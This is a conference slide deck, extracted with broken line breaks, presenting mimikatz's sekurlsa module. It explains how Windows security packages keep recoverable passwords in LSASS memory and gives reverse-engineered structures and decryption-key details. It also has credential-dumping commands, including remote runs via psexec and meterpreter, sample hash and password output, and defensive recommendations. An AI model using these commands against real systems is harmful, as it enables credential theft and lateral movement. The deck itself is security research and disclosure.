mimikatz
Benjamin DELPY `
gentilkiwi
`
focus on
sekurlsa
/pass
-
the
-
pass
and
crypto
patches
Who ? Why ?
Benjamin DELPY `
gentilkiwi
`
–
French
–
26y
–
Kiwi addict
–
Lazy programmer
Started to code
mimikatz
to :
–
explain security concepts ;
–
improve my knowledge ;
–
prove to Microsoft that sometimes they must change old habits.
Why all in French ?
–
because I’m
–
It limits script kiddies
usage
–
Hack with class
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
benjamin@gentilkiwi.com ; blog.gentilkiwi.com
2
mimikatz
working
On XP, 2003, Vista, 2008, Seven, 2008r2, 8, Server 8
–
x86 & x64
–
2000 support dropped with mimikatz 1.0
Everywhere ; it’s statically compiled
Two modes
–
direct action (local commands)
–
process or driver
communication
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
benjamin@gentilkiwi.com ; blog.gentilkiwi.com
3
sekurlsa.dll
m
i
m
i
k
a
t
z
.
e
x
e
KeyIso
«
Isolation de clé CNG
»
LSASS.EXE
Direct action :
crypto::patchcng
EventLog
«
Journal d’événements Windows
»
SVCHOST.EXE
Direct action :
divers::eventdrop
m
i
m
i
k
a
t
z
.
e
x
e
SamSS
«
Gestionnaire
de
comptes
de
sécurité
»
LSASS.EXE
VirtualAllocEx,
WriteProcessMemory,
CreateRemoteThread...
Open a pipe
Write a welcome message
Wait commands… and return results
mimikatz
architecture of
sekurlsa
&
crypto
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
benjamin@gentilkiwi.com ; blog.gentilkiwi.com
4
m
i
m
i
k
a
t
z
.
e
x
e
mod_mimikatz_sekurlsa
mod_mimikatz_nogpo
mod_mimikatz_divers
mod_mimikatz_winmine
mod_mimikatz_impersonate
mod_mimikatz_inject
mod_mimikatz_samdump
mod_mimikatz_standard
mod_mimikatz_crypto
mod_mimikatz_handle
mod_mimikatz_system
mod_mimikatz_service
mod_mimikatz_process
mod_mimikatz_thread
mod_mimikatz_terminalserver
mod_mimikatz_privilege
mod_pipe
mod_inject
mod_memory
mod_parseur
mod_patch
mod_hive
mod_secacl
mod_privilege
mod_process
mod_service
mod_system
mod_thread
mod_ts
mod_text
mod_crypto
mod_cryptoapi
mod_cryptoacng
msv_1_0
tspkg
wdigest
livessp
kerberos
kappfree.dll
kelloworld.dll
klock.dll
mimikatz.sys
sekurlsa.dll
sam
secrets
msv_1_0
wdigest
livessp
kerberos
tspkg
mimikatz ::
sekurlsa
what is it ?
A module replacement for my previous favorite library !
A local module that can read data from the
SamSS
Service (well
known LSASS process)
What
sekurlsa
module can dump :
–
MSV1_0
hashes
–
TsPkg
passwords
–
Wdigest
passwords
–
LiveSSP
passwords
–
Kerberos
passwords (!)
–
…?
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
benjamin@gentilkiwi.com ; blog.gentilkiwi.com
5
mod_mimikatz_sekurlsa
mimikatz ::
sekurlsa
how LSA
works
(
level
)
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
benjamin@gentilkiwi.com ; blog.gentilkiwi.com
6
LsaSS
WinLogon
Authentication
Packages
msv1_0
tspkg
wdigest
livessp
kerberos
Authentication
msv1_0
kerberos
SAM
Challenge
Response
user:domain:password
PLAYSKOOL
mimikatz ::
sekurlsa
how LSA
works
(
level
)
Authentication packages :
–
take user’s credentials from the logon
–
make their own stuff
–
keep enough
data
in memory to compute responses of
challenges (Single Sign On)
If we can get
data
, and inject it in another session of
LSASS, we avoid authentication part
This is the principle of «
Pass
-
the
-
hash
»
–
In fact, of «
Pass
-
the
-
x
»
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
benjamin@gentilkiwi.com ; blog.gentilkiwi.com
7
PLAYSKOOL
mimikatz ::
sekurlsa
history of «
pass
-
the
-
*
»
1/2
Pass
-
the
-
hash
–
1997
-
Unix modified SAMBA client for Hashes usage ;
Paul Ashton (EIGEN)
–
2000
-
Private version of a Windows «
LSA Logon Session Editor
» ;
Hernan
Ochoa (
CoreSecurity
)
–
2007
-
TechEd
@ Microsoft ;
Marc Murray (
TrueSec
)
present
msvctl
, and
provide some downloads of it
–
2007
-
«
Pass the hash toolkit
» published ;
Hernan
Ochoa (
CoreSecurity
)
–
2007
-
mimikatz 0.1
includes pass the hash and is publicly available for x86
& x64 versions of Windows (yeah, by
myself
but in French; so not famous ;))
2007 was the year of pass the hash !
Pass
-
the
-
ticket
–
04/2011
-
wce
(
pass the hash toolkit evolution
) provides Kerberos ticket
support;
Hernan
Ochoa (
Ampliasecurity
)
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
benjamin@gentilkiwi.com ; blog.gentilkiwi.com
8
mimikatz ::
sekurlsa
history of «
pass
-
the
-
*
»
2/2
Pass
-
the
-
pass
–
05/2011
–
mimikatz
1.0 dumps first clear text passwords from
TsPkg
provider (but limited to NT
6 and some XP SP3)
•
http://blog.gentilkiwi.com/securite/pass
-
the
-
pass
–
05/2011
–
return of
mimikatz
; it dumps clear text passwords from
WDigest
provider (unlimited
this time ;))
•
http://blog.gentilkiwi.com/securite/re
-
pass
-
the
-
pass
–
05/2011
–
Some organizations opened cases to Microsoft about it…
…Lots of time…
–
begin of 2012
-
Lots of blogs (and
Kevin
Mitnick
;)) say few words about mimikatz
–
03/2012
-
Hernan
Ochoa (
Ampliasecurity
)
publish at
seclists
that
wce
support
WDigest
password
extract…
•
http://seclists.org/pen
-
test/2012/Mar/7
–
03/2012
–
mimikatz
strikes again with
LiveSSP
provider and extracts Live login passwords from
Windows 8 memory
•
http://blog.gentilkiwi.com/securite/rere
-
pass
-
the
-
pass
–
03/2012
–
yeah, once again…, more curious but
Kerberos
keeps passwords in memory
•
http://blog.gentilkiwi.com/securite/rerere
-
pass
-
the
-
pass
–
08/2012
–
sekurlsa
module without injection at all ! (ultra safe)
•
http://
blog.gentilkiwi.com/securite/mimikatz/sekurlsa
-
fait
-
son
-
apparition
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
benjamin@gentilkiwi.com ; blog.gentilkiwi.com
9
mimikatz ::
sekurlsa
::
tspkg
because sometimes hash is not enough
…
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
benjamin@gentilkiwi.com ; blog.gentilkiwi.com
10
mimikatz ::
sekurlsa
::
tspkg
what is it ?
Microsoft introduces SSO capability for Terminal Server with
NT 6 to improve
RemoteApps
and
RemoteDestkop
users’s
experience
–
http://technet.microsoft.com/library/cc772108.aspx
Rely on
CredSSP
with Credentials Delegation (!= Account
delegation)
–
Specs :
http://download.microsoft.com/download/9/5/e/95ef66af
-
9026
-
4bb0
-
a41d
-
a4f81802d92c/%5Bms
-
cssp%5D.pdf
First impression : it
seems
cool
–
User does not have to type its password
–
Password is not in RDP file
–
Password is not in user
secrets
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
benjamin@gentilkiwi.com ; blog.gentilkiwi.com
11
mimikatz ::
sekurlsa
::
tspkg
questions ?
KB says that for it works, we must enable «
Default credentials
» delegation
–
“
Default credentials : The credentials obtained when the user first logs on to
Windows
”
-
https://msdn.microsoft.com/library/bb204773.aspx
•
What ? Our User/Domain/{Password | Hash | Ticket} ? It seems …
–
In all cases, system seems to be vulnerable to pass
-
the
-
*…
In what form ?
Our specs : [MS
-
CSSP]
–
2.2.1.2.1
TSPasswordCreds
•
The
TSPasswordCreds
structure contains the user's password credentials that are delegated
to the server. (or PIN)
TSPasswordCreds
::= SEQUENCE {
domainName
[0] OCTET STRING,
userName
[1] OCTET STRING,
password
[2] OCTET STRING
}
–
Challenge / response for authentication ?
•
Serveur
:
YES
(TLS / Kerberos)
•
Client :
NO
; *password* is sent to server…
So password resides somewhere in memory ?
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
benjamin@gentilkiwi.com ; blog.gentilkiwi.com
12
mimikatz ::
sekurlsa
::
tspkg
symbols & theory
Let’s explore some symbols
!
–
sounds cool…
(thanks Microsoft)
Let’s imagine a scenario
–
Enumerate all sessions to obtain
:
•
Username
•
Domain
•
LUID
–
Call
tspkg!TSCredTableLocateDefaultCreds
(rely on
RtlLookupElementGenericTableAvl
) with
LUID to obtain :
•
TS_CREDENTIAL
–
Call
tspkg!TSObtainClearCreds
(rely on
LsaUnprotectMemory
) with
TS_CREDENTIAL
data
(
TS_PRIMARY_CREDENTIAL
) for :
•
TS_PRIMARY_CREDENTIAL
with clear text credentials
…
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
benjamin@gentilkiwi.com ; blog.gentilkiwi.com
13
kd
> x
tspkg
!*clear*
75016d1c
tspkg!TS
ObtainClearCreds
= <no type information>
kd
> x
tspkg
!*password*
75011b68
tspkg!TSDuplicatePassword
= <no type information>
75011cd4
tspkg!TSHidePassword
= <no type information>
750195ee
tspkg!TS
RevealPassword
= <no type information>
75012fbd
tspkg!TSUpdateCredentialsPassword
= <no type information>
kd
> x
tspkg
!*locate*
7501158b
tspkg!TSCredTable
LocateDefaultCred
s
= <no type information>
mimikatz ::
sekurlsa
::
tspkg
workflow
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
benjamin@gentilkiwi.com ; blog.gentilkiwi.com
14
RtlLookupElementGenericTabl
eAvl
LsaUnprotectMemory
KIWI_TS_CREDEN
TIAL
KIWI_TS_PRIMAR
Y_CREDENTIAL
typedef
struct
_KIWI_TS_PRIMARY_CREDENTIAL {
PVOID unk0;
LSA_UNICODE_STRING
Domaine
;
LSA_UNICODE_STRING
UserName
;
LSA_UNICODE_STRING Password;
} KIWI_TS_PRIMARY_CREDENTIAL,
*PKIWI_TS_PRIMARY_CREDENTIAL;
LsaEnumerateLogonSessions
for each LUID
password
in clear !
tspkg!TSGlobal
CredTable
typedef
struct
_KIWI_TS_CREDENTIAL {
#
ifdef
_M_X64
BYTE unk0[108];
#
elif
defined _M_IX86
BYTE unk0[64];
#
endif
LUID
LocallyUniqueIdentifier
;
PVOID unk1;
PVOID unk2;
PKIWI_TS_PRIMARY_CREDENTIAL
pTsPrimary
;
} KIWI_TS_CREDENTIAL, *PKIWI_TS_CREDENTIAL;
KIWI_TS_CREDEN
TIAL
mimikatz ::
sekurlsa
::
tspkg
demo time !
sekurlsa
::
tspkg
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
benjamin@gentilkiwi.com ; blog.gentilkiwi.com
15
mimikatz ::
sekurlsa
::
wdigest
because clear text password over http/https is not cool
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
benjamin@gentilkiwi.com ; blog.gentilkiwi.com
16
mimikatz ::
sekurlsa
::
wdigest
what is it ?
“
Digest access authentication
is one of the agreed
-
upon methods a
web server can use to negotiate credentials with a user's web
browser.
It applies a hash function to a password
before sending it
over the network […]”
Wikipedia
:
http://en.wikipedia.org/wiki/Digest_access_authentication
“Common Digest Authentication Scenarios :
–
Authenticated client access to a Web site
–
Authenticated client access using SASL
–
Authenticated client access with integrity protection to a directory service
using LDAP”
Microsoft
:
http://technet.microsoft.com/library/cc778868.aspx
Again, it
seems
cool
–
No password over the network, just hashes
–
No reversible password in Active Directory ; hashes for each realm
•
Only with Advanced Digest
authentication
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
benjamin@gentilkiwi.com ; blog.gentilkiwi.com
17
mimikatz ::
sekurlsa
::
wdigest
what is it ?
We speak about hashes, but what hashes ?
H = MD5(HA1:nonce:[…]:HA2)
•
HA1 = MD5(
username:realm:
password
)
•
HA2 = MD5(
method:digestURI
:[…])
Even after login,
HA1
may change…
realm
is from server side
and cannot be determined before Windows logon
WDigest
provider
must
have elements to compute responses
for different servers :
–
Username
–
Realm (from server)
–
Password
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
benjamin@gentilkiwi.com ; blog.gentilkiwi.com
18
mimikatz ::
sekurlsa
::
wdigest
theory
This time, we
know
:
–
that
WDigest
keeps password in memory «
by protocol
» for
HA1
digest
–
that LSASS love to unprotect password with
LsaUnprotectMemory
(so protect
with
LsaProtectMemory
)
LsaUnprotectMemory
–
At offset
0xb4
of
LSA_SECPKG_FUNCTION_TABLE
–
Let’s perform a research in
WDigest
:
–
Hypothesis seems verified
LsaProtectMemory
–
At offset
0xb0
of
LSA_SECPKG_FUNCTION_TABLE
–
Let’s perform a research in
WDigest
:
–
SpAcceptCredentials
takes clear password in
args
•
Protect it with
LsaProtectMemory
•
Update or insert data in double linked list :
wdigest!l_LogSessList
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
benjamin@gentilkiwi.com ; blog.gentilkiwi.com
19
.text:7409D151 _
DigestCalc
HA1
@8 call
dword
ptr
[eax
+0B4h
]
.text:74096C69 _
SpAcceptCredentials@16 call
dword
ptr
[eax+
0B0h
]
mimikatz ::
sekurlsa
::
wdigest
workflow
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
benjamin@gentilkiwi.com ; blog.gentilkiwi.com
20
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
typedef
struct
_KIWI_WDIGEST_LIST_ENTRY {
struct
_KIWI_WDIGEST_LIST_ENTRY *
Flink
;
struct
_KIWI_WDIGEST_LIST_ENTRY *Blink;
DWORD
UsageCount
;
struct
_KIWI_WDIGEST_LIST_ENTRY *This;
LUID
LocallyUniqueIdentifier
;
[…]
LSA_UNICODE_STRING
UserName
;
LSA_UNICODE_STRING
Domaine
;
LSA_UNICODE_STRING Password;
[…]
} KIWI_WDIGEST_LIST_ENTRY,
*PKIWI_WDIGEST_LIST_ENTRY;
wdigest!l_LogS
essList
search linked list for LUID
KIWI_WDIGEST_L
IST_ENTRY
password
in clear !
mimikatz ::
sekurlsa
::
wdigest
demo time !
sekurlsa
::
wdigest
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
benjamin@gentilkiwi.com ; blog.gentilkiwi.com
21
mimikatz ::
sekurlsa
::
livessp
because Microsoft was too good in closed networks
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
benjamin@gentilkiwi.com ; blog.gentilkiwi.com
22
mimikatz ::
sekurlsa
::
livessp
how
Actually I’ve only used logical (empirical) approach to
search passwords… :
–
Protocol reading
–
Symbols searching
~ Boring
~
… be more brutal this time : make a
WinDBG
trap !
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
benjamin@gentilkiwi.com ; blog.gentilkiwi.com
23
0:
kd
>
!process 0 0 lsass.exe
PROCESS
83569040
SessionId
: 0 Cid: 0224
Peb
: 7f43f000
ParentCid
: 01b4
DirBase
: 5df58100
ObjectTable
: 80ce4740
HandleCount
: <Data Not Accessible>
Image: lsass.exe
0:
kd
> .process /
i
83569040
You need to continue execution (press 'g' <enter>) for the context
to be switched. When the debugger breaks in again, you will be in
the new process context.
0:
kd
>
g
Break instruction exception
-
code 80000003 (first chance)
nt!RtlpBreakWithStatusInstruction
:
814b39d0 cc
int
3
0:
kd
>
.reload /user
Loading User Symbols
............................................................
0:
kd
>
bp
/p @$
proc
lsasrv!LsaProtectMemory
"
kc
5 ; g"
0:
kd
>
g
mimikatz ::
sekurlsa
::
livessp
how
Let’s login with a Live account on Windows 8 !
After credentials protection,
LsaApLogonUserEx2
calls
LiveCreateLogonSession
to insert data in
LiveGlobalLogonSessionList
(similar to
WDigest
)
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
benjamin@gentilkiwi.com ; blog.gentilkiwi.com
24
lsasrv!LsaProtectMemory
livessp!LiveMakeSupplementalCred
livessp!LiveMakeSecPkgCredentials
livessp!LsaApLogonUserEx2
livessp!SpiLogonUserEx2
lsasrv!LsaProtectMemory
msv1_0!NlpAddPrimaryCredential
msv1_0!SspAcceptCredentials
msv1_0!SpAcceptCredentials
lsasrv!LsaProtectMemory
tspkg!TSHidePassword
tspkg!SpAcceptCredentials
1:
kd
>
uf
/c livessp!LsaApLogonUserEx2
livessp!LsaApLogonUserEx2 (74781536)
[...]
livessp!LsaApLogonUserEx2+0x560 (74781a96):
call to
livessp!LiveCreateLogonSession
(74784867)
Our
LiveSSP
provider
Yeah, Pass the Hash capability with Live
account too…
Live user can logon through RDP via SSO
mimikatz ::
sekurlsa
::
livessp
workflow
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
benjamin@gentilkiwi.com ; blog.gentilkiwi.com
25
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password
in clear !
typedef struct _KIWI_LIVESSP_LIST_ENTRY {
struct _KIWI_LIVESSP_LIST_ENTRY *Flink;
struct _KIWI_LIVESSP_LIST_ENTRY *Blink;
PVOID
unk0;
PVOID
unk1;
PVOID
unk2;
PVOID
unk3;
DWORD
unk4;
DWORD
unk5;
PVOID
unk6;
LUID
LocallyUniqueIdentifier;
LSA_UNICODE_STRING UserName;
PVOID
unk7;
PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds;
} KIWI_LIVESSP_LIST_ENTRY,
*PKIWI_LIVESSP_LIST_ENTRY;
livessp!LiveGloba
lLogonSessionList
search linked list for LUID
KIWI_LIVESSP_LIS
T_ENTRY
KIWI_LIVESSP_PRI
MARY_CREDENTIAL
typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL {
DWORD isSupp;
DWORD unk0;
LSA_UNICODE_STRING UserName;
LSA_UNICODE_STRING Domaine;
LSA_UNICODE_STRING Password;
} KIWI_LIVESSP_PRIMARY_CREDENTIAL,
*PKIWI_LIVESSP_PRIMARY_CREDENTIAL;
mimikatz ::
sekurlsa
Even if we already have tools for
normal
accounts, are you
not curious to test one with this trap
?*
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
benjamin@gentilkiwi.com ; blog.gentilkiwi.com
26
* Me, yes
mimikatz ::
sekurlsa
::
kerberos
Let’s login normal account
After credentials protection,
KerbCreateLogonSession
calls :
–
NT6
;
KerbInsertOrLocateLogonSession
to insert data in
KerbGlobalLogonSessionTable
–
NT5
;
KerbInsertLogonSession
to insert data in
KerbLogonSessionList
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
benjamin@gentilkiwi.com ; blog.gentilkiwi.com
27
lsasrv!LsaProtectMemory
kerberos!KerbHideKey
kerberos!KerbCreatePrimaryCredentials
kerberos!KerbCreateLogonSession
kerberos!SpAcceptCredentials
lsasrv!LsaProtectMemory
kerberos!KerbHidePassword
kerberos!KerbCreateLogonSession
kerberos!SpAcceptCredentials
lsasrv!LsaProtectMemory
msv1_0!NlpAddPrimaryCredential
msv1_0!SspAcceptCredentials
msv1_0!SpAcceptCredentials
lsasrv!LsaProtectMemory
wdigest!SpAcceptCredentials
lsasrv!LsaProtectMemory
tspkg!TSHidePassword
tspkg!SpAcceptCredentials
Kerberos part for password ??????
Kerberos, ticket part ? Maybe ;)
mimikatz ::
sekurlsa
::
kerberos
(nt6)
workflow
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
benjamin@gentilkiwi.com ; blog.gentilkiwi.com
28
RtlLookupElementGenericTabl
eAvl
LsaUnprotectMemory
KIWI_KERBEROS_PR
IMARY_CREDENTIAL
typedef
struct
_KIWI_KERBEROS_PRIMARY_CREDENTIAL
{
DWORD unk0;
PVOID unk1;
PVOID unk2;
PVOID unk3;
#
ifdef
_M_X64
BYTE unk4[32];
#
elif
defined _M_IX86
BYTE unk4[20];
#
endif
LUID
LocallyUniqueIdentifier
;
#
ifdef
_M_X64
BYTE unk5[44];
#
elif
defined _M_IX86
BYTE unk5[36];
#
endif
LSA_UNICODE_STRING
UserName
;
LSA_UNICODE_STRING
Domaine
;
LSA_UNICODE_STRING Password;
} KIWI_KERBEROS_PRIMARY_CREDENTIAL,
*PKIWI_KERBEROS_PRIMARY_CREDENTIAL;
LsaEnumerateLogonSessions
for each LUID
password
in clear !
KIWI_KERBEROS_PR
IMARY_CREDENTIAL
Kerberos!KerbG
lobalLogonSess
ionTable
mimikatz ::
sekurlsa
::
kerberos
(nt5)
workflow
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
benjamin@gentilkiwi.com ; blog.gentilkiwi.com
29
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password
in clear !
typedef struct _KIWI_KERBEROS_LOGON_SESSION {
struct _KIWI_KERBEROS_LOGON_SESSION *Flink;
struct _KIWI_KERBEROS_LOGON_SESSION *Blink;
DWORD
UsageCount;
PVOID
unk0;
PVOID
unk1;
PVOID
unk2;
DWORD
unk3;
DWORD
unk4;
PVOID
unk5;
PVOID
unk6;
PVOID
unk7;
LUID LocallyUniqueIdentifier;
#ifdef _M_IX86
DWORD
unk8;
#endif
DWORD
unk9;
DWORD
unk10;
PVOID
unk11;
DWORD
unk12;
DWORD
unk13;
PVOID
unk14;
PVOID
unk15;
PVOID
unk16;
[…]
LSA_UNICODE_STRING UserName;
LSA_UNICODE_STRING Domaine;
LSA_UNICODE_STRING Password;
} KIWI_KERBEROS_LOGON_SESSION,
*PKIWI_KERBEROS_LOGON_SESSION;
kerberos!KerbLog
onSessionList
search linked list for LUID
KIWI_LIVESSP_PRI
MARY_CREDENTIAL
mimikatz ::
sekurlsa
demo time !
Final
sekurlsa
demo
sekurlsa
::
logonPasswords
full
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
benjamin@gentilkiwi.com ; blog.gentilkiwi.com
30
mimikatz ::
sekurlsa
::
kerberos
“
hu
?”
Ok It works…*
But why ?
*
Not
at all logon on
NT5 (can
need an
unlock)
From
my understanding of
Microsoft explanations
–
no
need of passwords for the Kerberos protocol…
–
all
is based on the hash (
not very sexy too
)
Microsoft’s
implementation of Kerberos is full of logical…
–
For
password
auth
:
•
password hash for shared secret, but
keeping password in memory
–
For
full smartcard
auth
:
•
No password on client
•
No hash on client ?
–
NTLM hash on client…
–
KDC sent it back as a
gift
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
benjamin@gentilkiwi.com ; blog.gentilkiwi.com
31
mimikatz ::
sekurlsa
A
ll passwords in memory are encrypted, but in a reversible way to be used
We used
LsaUnprotecMemory
, in the
LSASS
context, to decrypt them
–
This function rely on
LsaEncryptMemory
from
lsasrv.dll
For that, we previously inject a DLL (
sekurlsa.dll
) in the
LSASS
process to take
benefits of its keys when we called it
Can it be fun to decrypt outside the process ?
–
Yes, it is… no more injection, just reading memory of LSASS process…
mimikatz
can use
lsasrv.dll
too and “imports”
LSASS
initialized keys
–
When we call
LsaEncryptMemory
in
mimikatz
, with all keys imported from
LSASS
, we have
the same comportments than when we are in
LSASS
!
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
benjamin@gentilkiwi.com ; blog.gentilkiwi.com
32
LsaUnprotectMemory
mimikatz ::
sekurlsa
LsaEncryptMemory
NT5
Depending on the size of the secret,
LsaEncryptMemory
use :
–
RC4
–
DES
x
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
benjamin@gentilkiwi.com ; blog.gentilkiwi.com
33
g_pRandomKey
g_cbRandomKey
@
BYTE[
g_cbRandomKey
]
DWORD ; 256
BYTE[
g_cbRandomKey
]
g_pDESXKey
@
BYTE[
144]
BYTE[
144]
g_Feedback
BYTE[
8]
l
s
a
s
s
l
s
a
s
r
v
l
s
a
s
s
l
s
a
s
r
v
m
i
m
i
k
a
t
z
l
s
a
s
r
v
copy…
mimikatz ::
sekurlsa
LsaEncryptMemory
NT6
Depending on the size of the secret,
LsaEncryptMemory
use :
–
3DES
–
AES
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
benjamin@gentilkiwi.com ; blog.gentilkiwi.com
34
InitializationVector
BYTE[
16]
l
s
a
s
s
l
s
a
s
r
v
l
s
a
s
s
l
s
a
s
r
v
m
i
m
i
k
a
t
z
copy…
h3DesKey
typedef
struct
_KIWI_BCRYPT_KEY_DATA {
DWORD size
;
DWORD tag;
DWORD type;
DWORD unk0;
DWORD unk1;
DWORD unk2;
DWORD unk3;
PVOID unk4;
BYTE data
; /* etc... */
} KIWI_BCRYPT_KEY_DATA,
*PKIWI_BCRYPT_KEY_DATA
;
hAesKey
l
s
a
s
r
v
typedef
struct
_KIWI_BCRYPT_KEY {
DWORD size;
DWORD type;
PVOID unk0;
PKIWI_BCRYPT_KEY_DATA
cle
;
PVOID unk1;
} KIWI_BCRYPT_KEY, *PKIWI_BCRYPT_KEY;
mimikatz ::
sekurlsa
memo
Security Packages
Protection Keys
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
benjamin@gentilkiwi.com ; blog.gentilkiwi.com
35
Package
Symbols
Type
tspkg
tspkg!
TSGlobalCredTable
RTL_AVL_TABLE
wdigest
wdigest!
l_LogSessList
LIST_ENTRY
livessp
livessp!
LiveGlobalLogonSessionList
LIST_ENTRY
kerberos
(nt5)
kerberos!
KerbLogonSessionList
LIST_ENTRY
kerberos
(nt6)
kerberos!
KerbGlobalLogonSessionTable
RTL_AVL_TABLE
msv1_0
lsasrv
!
LogonSessionList
lsasrv
!
LogonSessionListCount
LIST_ENTRY
ULONG
Key NT
5
Symbols
RC4
lsasrv!
g_cbRandomKey
lsasrv!
g_pRandomKey
DES
x
lsasrv!
g_pDESXKey
lsasrv!
g_Feedback
Key NT
6
Symbols
lsasrv!
InitializationVector
3DES
lsasrv!
h3DesKey
AES
lsasrv!
hAesKey
mimikatz ::
sekurlsa
memo
Some commands :
mimikatz
privilege::debug "
sekurlsa
::
logonPasswords
full" exit
psexec
\
\
windows
-
s
-
c c:
\
mimikatz
\
Win32
\
mimikatz.exe
"
sekurlsa
::
logonPasswords
full" exit
meterpreter
> execute
-
H
-
c
-
i
-
m
-
f /
pentest
/passwords/mimikatz/
mimikatz_x86.exe
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
benjamin@gentilkiwi.com ; blog.gentilkiwi.com
36
mimikatz 1.0 x64 (RC)
/* Traitement du Kiwi (
Aug
2 2012 01:32:28) */
// http://blog.gentilkiwi.com/mimikatz
mimikatz #
privilege
::
debug
Demande d'ACTIVATION du privilège :
SeDebugPrivilege
: OK
mimikatz #
sekurlsa
::
logonPasswords
full
Authentification Id
: 0;234870
Package d'authentification
: NTLM
Utilisateur principal
: Gentil Kiwi
Domaine d'authentification
: vm
-
w8
-
rp
-
x
msv1_0 :
* Utilisateur
: Gentil Kiwi
* Domaine
: vm
-
w8
-
rp
-
x
* Hash LM
: d0e9aee149655a6075e4540af1f22d3b
* Hash NTLM
: cc36cf7a8514893efccd332446158b1a
kerberos
:
* Utilisateur
: Gentil Kiwi
* Domaine
: vm
-
w8
-
rp
-
x
* Mot de passe : waza1234/
wdigest
:
* Utilisateur
: Gentil Kiwi
* Domaine
: vm
-
w8
-
rp
-
x
* Mot de passe : waza1234/
tspkg
:
* Utilisateur
: Gentil Kiwi
* Domaine
: vm
-
w8
-
rp
-
x
* Mot de passe : waza1234/
livessp
:
n.t. (LUID KO)
mimikatz ::
sekurlsa
what we can do ?
Basics
–
No physical access to computer (first step to pass the
hash, then pass the pass)
–
No admin rights / system rights /
debug privileges
(…)
–
Disable local admin accounts
–
Strong passwords
(
haha
, it was a
joke ; so useless !!!)
–
For privileged account, network
login instead of interactive (when possible)
–
Audit ; pass the
hash
keeps traces and can lock accounts
–
No admin rights / system rights / debug privileges, even
VIP
–
Use separated network (or forest) for privileged tasks
More in depth
–
Force strong authentication (
SmartCard
& Token) : $ /
€
–
Short validity for Kerberos tickets
–
No delegation
–
Disable NTLM (available with NT6)
–
No
exotic
:
•
biometrics (it keeps password somewhere and push it to Windows)
•
single sign on
–
Stop shared secrets for authentication : push Public / Private stuff (like keys ;))
–
Let opportunities to stop
retro compatibility
–
Disable faulty providers ?
•
Is it supported by Microsoft ?
•
Even
if you
can
disable
LiveSSP
,
TsPkg
and
WDigest
, will you disable
Kerberos and msv1_0 ?
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
benjamin@gentilkiwi.com ; blog.gentilkiwi.com
37
mimikatz ::
crypto
what is it ?
A little module that I wrote to :
–
play with Windows Cryptographic API / CNG and
RSA keys
–
automate export of certificates/keys
•
Even those which are “not” exportable
What
crypto
module can
do
:
–
List
•
Providers
•
Stores
•
Certificates
•
Keys
–
Export
•
Certificates
–
public in DER format
–
with private keys in
PFX
format
•
Private keys in
PVK
format
–
it’s cool,
OpenSSL
can deal with it too
–
Patch
•
CryptoAPI
in mimikatz context
•
CNG
in
LSASS
context (again !)
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
benjamin@gentilkiwi.com ; blog.gentilkiwi.com
38
mod_mimikatz_crypto
mimikatz ::
crypto
how it’s protected
Private keys are DPAPI protected
–
You cannot reuse private key files on another computer
•
At least without the master keys and/or password of users
Computer/User can load their own keys because they have enough
secrets to do it (ex : session opened)
–
Yes, a computer/server open a “session”
Export/Usage can be
limited
by :
–
Password
–
Popup
–
Export/Archive flag no present
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
benjamin@gentilkiwi.com ; blog.gentilkiwi.com
39
Constraint for most user
Unavailable for computer keys
certutil
-
importpfx
mycert.p12
NoExport
certutil
-
csp
"
Microsoft Enhanced Cryptographic Provider
v1.0
"
-
importpfx
mycert.p12
NoExport
mimikatz ::
crypto ::
capi
how it works
“Microsoft
CryptoAPI provides a secure interface for the cryptographic functionality that is
supplied by the installable cryptographic service provider (CSP) modules. CSPs perform all
cryptographic operations and manage private keys CSPs can be implemented in software
as well as in hardware
.”
–
http://
